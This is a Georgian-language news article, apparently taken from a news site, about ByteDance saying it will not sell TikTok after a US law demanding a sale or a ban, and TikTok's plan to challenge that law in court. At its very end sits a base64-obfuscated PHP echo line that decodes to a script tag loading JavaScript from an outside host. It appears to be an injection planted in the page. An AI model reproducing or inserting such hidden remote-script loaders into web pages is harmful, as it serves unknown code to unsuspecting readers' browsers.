celsiusi
ავერსი საქკაბელი

 სოციალურ ქსელ „ტიკტოკის“ მფლობელ ჩინურ კომპანია ByteDance-ში აცხადებენ, რომ ბიზნესის გაყიდვას არ აპირებენ. განცხადება მას შემდეგ გაკეთა, რაც შეერთებულმა შტატებმა მიიღო კანონი, რომელიც „ტიკტოკის“ მფლობელ კომპანიას მის გაყიდვას ავალდებულებს, წინააღმდეგ შემთხვევაში სოციალური ქსელი აშშ-ში დაიბლოკება. ამის შესახებ „ბიბისი“ წერს.

„ByteDance-ს „ტიკტოკის“ გაყიდვის გეგმა არ აქვს“, – ნათქვამია კომპანიის სოციალურ ქსელში.

მანამდე კი „ტიკტოკის“ წარმომადგენლებმა აღნიშნეს, რომ „არაკონსტიტუციურ“ კანონს სასამართლოში გაასაჩივრებენ.

„ჩვენ თავდაჯერებულები ვართ და ვიბრძოლებთ ჩვენი უფლებებისთვის სასამართლოში. ფაქტები და კონსტიტუცია ჩვენს მხარესაა“, – განაცხადა „ტიკტოკის“ ხელმძღვანელმა, შოუ ჩიუმ.

აშშ-ს პრეზიდენტმა შესაბამისი კანონი წარმომადგენელთა პალატის და სენატის მიერ მისი მხარდაჭერის შემდეგ მიიღო. კანონის მიხედვით, „ტიკტოკის“ მფლობელ ჩინურ კომპანიას პლატფორმის გასაყიდად ცხრათვიანი ვადა ეძლევა. წინააღმდეგ შემთხვევაში, ის აშშ-ის აპლიკაციების მარკეტში აიკრძალება. კანონით პრეზიდენტ ჯო ბაიდენს უფლებამოსილება ეძლევა, გაახანგრძლივოს ვადა კიდევ 90 დღით, თუ დადგინდება, რომ გაყიდვის მიმართულებით პროგრესი მიღწეულია.

პეკინის მიერ კერძო კომპანიებზე კონტროლის გამკაცრებამ შეერთებულ შტატებსა და სხვა დასავლურ ქვეყნებში შეშფოთება გამოიწვია, თუ რამდენად კონტროლდება ჩინური კომუნისტური პარტიის მიერ კომპანია ByteDance-ი და მონაცემები, რომელსაც ის ინახავს.

„ტიკტოკი“ უარყოფს ბრალდებას, თითქოს ჩინეთის ხელისუფლებას კომპანიაზე აქვს წვდომა.

182
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");